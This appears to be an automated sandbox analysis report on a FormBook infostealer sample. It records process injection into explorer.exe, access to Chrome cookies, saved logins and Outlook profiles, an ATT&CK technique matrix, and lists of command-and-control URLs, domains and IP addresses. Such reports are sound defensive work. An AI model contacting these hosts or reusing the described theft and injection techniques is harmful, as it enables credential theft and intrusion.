          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeJump to behavior
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.327263504.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.574282998.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.318203390.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.567226844.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004019C5 cpuid 1_2_004019C5
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_0040163B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager16
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Virtualization/Sandbox Evasion          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Access Token Manipulation          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common512
          Process Injection          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 830750 Sample: SecuriteInfo.com.Trojan.Gar... Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\Local\...\vfpbkeeo.exe, PE32 9->27 dropped 12 vfpbkeeo.exe 1 9->12         started        process5 signatures6 55 Multi AV Scanner detection for dropped file 12->55 57 Detected unpacking (changes PE section rights) 12->57 59 Machine Learning detection for dropped file 12->59 61 2 other signatures 12->61 15 vfpbkeeo.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 20 explorer.exe 1 15->20 injected process9 dnsIp10 29 un-object.com 192.185.17.12, 49713, 49714, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 www.222ambking.org 91.195.240.94, 49701, 49702, 80 SEDO-ASDE Germany 20->31 33 13 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 45 Performs DNS queries to domains with low reputation 20->45 24 cmd.exe 13 20->24         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 24->47 49 Tries to harvest and steal browser information (history, passwords, etc) 24->49 51 Modifies the context of a thread in another process (thread injection) 24->51 53 Maps a DLL or memory area into another process 24->53

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe42%ReversingLabsWin32.Trojan.FormBook
          SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe42%VirustotalBrowse
          SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe39%ReversingLabsWin32.Trojan.Lazy

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.vfpbkeeo.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.vfpbkeeo.exe.2080000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.bitservicesltd.com2%VirustotalBrowse
          www.younrock.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw==100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/u2kb/1%VirustotalBrowse
          http://www.avisrezervee.com/u2kb/www.avisrezervee.com100%Avira URL Cloudmalware
          http://www.mygloballojistik.online0%Avira URL Cloudsafe
          http://www.thedivinerudraksha.com/u2kb/100%Avira URL Cloudmalware
          http://www.gritslab.com/u2kb/www.gritslab.com100%Avira URL Cloudmalware
          http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk100%Avira URL Cloudmalware
          http://www.germanreps.com0%Avira URL Cloudsafe
          http://www.shapshit.xyz0%Avira URL Cloudsafe
          http://www.ecomofietsen.com0%Avira URL Cloudsafe
          http://www.white-hat.uk/u2kb/www.white-hat.uk100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com0%Avira URL Cloudsafe
          http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l100%Avira URL Cloudmalware
          http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ==100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg==100%Avira URL Cloudmalware
          http://www.energyservicestation.com/u2kb/www.energyservicestation.com100%Avira URL Cloudmalware
          http://www.un-object.com/u2kb/100%Avira URL Cloudmalware
          http://www.energyservicestation.com/u2kb/100%Avira URL Cloudmalware
          http://www.white-hat.uk0%Avira URL Cloudsafe
          http://www.dzyngiri.com0%Avira URL Cloudsafe
          http://www.employerseervices.com/u2kb/www.employerseervices.com0%Avira URL Cloudsafe
          http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.avisrezervee.com0%Avira URL Cloudsafe
          http://www.mygloballojistik.online/u2kb/0%Avira URL Cloudsafe
          http://www.bitservicesltd.com0%Avira URL Cloudsafe
          http://justinmezzell.com0%Avira URL Cloudsafe
          http://www.thewildphotographer.co.uk/u2kb/100%Avira URL Cloudmalware
          http://www.gritslab.com0%Avira URL Cloudsafe
          http://www.white-hat.uk/u2kb/100%Avira URL Cloudmalware
          https://alldomains.hosting/domain-registrieren.html0%Avira URL Cloudsafe
          http://www.bitservicesltd.com/u2kb/100%Avira URL Cloudmalware
          http://www.thewildphotographer.co.uk0%Avira URL Cloudsafe
          http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop100%Avira URL Cloudmalware
          http://www.222ambking.org/u2kb/www.222ambking.org100%Avira URL Cloudmalware
          http://www.gritslab.com/u2kb/100%Avira URL Cloudmalware
          http://www.employerseervices.com/u2kb/0%Avira URL Cloudsafe
          http://www.fclaimrewardccpointq.shop/u2kb/100%Avira URL Cloudmalware
          http://www.energyservicestation.com0%Avira URL Cloudsafe
          http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.younrock.com0%Avira URL Cloudsafe
          https://alldomains.hosting/e-mail-server.html0%Avira URL Cloudsafe
          http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c100%Avira URL Cloudmalware
          http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ==100%Avira URL Cloudmalware
          http://www.un-object.com/u2kb/www.un-object.com100%Avira URL Cloudmalware
          http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com100%Avira URL Cloudmalware
          http://www.fclaimrewardccpointq.shop100%Avira URL Cloudmalware
          http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw==100%Avira URL Cloudmalware
          http://www.shapshit.xyz/u2kb/100%Avira URL Cloudmalware
          http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online0%Avira URL Cloudsafe
          https://alldomains.hosting/0%Avira URL Cloudsafe
          http://www.ecomofietsen.com/u2kb/100%Avira URL Cloudmalware
          http://www.avisrezervee.com/u2kb/100%Avira URL Cloudmalware
          https://alldomains.hosting/hosting-webhosting.html0%Avira URL Cloudsafe
          http://www.germanreps.com/u2kb/www.germanreps.com100%Avira URL Cloudmalware
          http://www.younrock.com/u2kb/www.younrock.com100%Avira URL Cloudmalware
          http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.222ambking.org0%Avira URL Cloudsafe
          http://www.germanreps.com/u2kb/100%Avira URL Cloudmalware
          http://www.222ambking.org/u2kb/100%Avira URL Cloudmalware
          http://www.employerseervices.com0%Avira URL Cloudsafe
          http://www.shapshit.xyz/u2kb/www.shapshit.xyz100%Avira URL Cloudmalware
          http://www.un-object.com0%Avira URL Cloudsafe
          http://www.younrock.com/u2kb/100%Avira URL Cloudmalware
          http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com100%Avira URL Cloudmalware
          http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bitservicesltd.com
          		161.97.163.8
          		truetrueunknown
          www.younrock.com
          		81.17.18.198
          		truetrueunknown
          www.energyservicestation.com
          		213.145.228.111
          		truetrue
            		unknown
            www.thewildphotographer.co.uk
            		45.33.30.197
            		truetrue
              		unknown
              www.shapshit.xyz
              		199.192.30.147
              		truetrue
                		unknown
                www.222ambking.org
                		91.195.240.94
                		truetrue
                  		unknown
                  thedivinerudraksha.com
                  		85.187.128.34
                  		truetrue
                    		unknown
                    un-object.com
                    		192.185.17.12
                    		truetrue
                      		unknown
                      white-hat.uk
                      		94.176.104.86
                      		truetrue
                        		unknown
                        gritslab.com
                        		78.141.192.145
                        		truetrue
                          		unknown
                          www.un-object.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.white-hat.uk
                            		unknown
                            		unknowntrue
                              		unknown
                              www.gritslab.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.thedivinerudraksha.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.fclaimrewardccpointq.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.thedivinerudraksha.com/u2kb/true
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.energyservicestation.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.un-object.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.thewildphotographer.co.uk/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bitservicesltd.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.gritslab.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.shapshit.xyz/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.222ambking.org/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.younrock.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                      		high
                                      http://www.avisrezervee.com/u2kb/www.avisrezervee.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://duckduckgo.com/ac/?q=HI4NJ046K.5.drfalse
                                        		high
                                        http://www.gritslab.com/u2kb/www.gritslab.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_ccmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://img.sedoparking.comexplorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://search.yahoo.com?fr=crmas_sfpfcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                              		high
                                              http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.ukexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.mygloballojistik.onlineexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.shapshit.xyzexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.germanreps.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lexplorer.exe, 00000004.00000002.580448726.00000000158A6000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004A96000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.ecomofietsen.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.thedivinerudraksha.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.white-hat.uk/u2kb/www.white-hat.ukexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.energyservicestation.com/u2kb/www.energyservicestation.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.white-hat.ukexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.employerseervices.com/u2kb/www.employerseervices.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dzyngiri.comexplorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mygloballojistik.online/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.avisrezervee.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bitservicesltd.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://justinmezzell.comexplorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.white-hat.uk/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
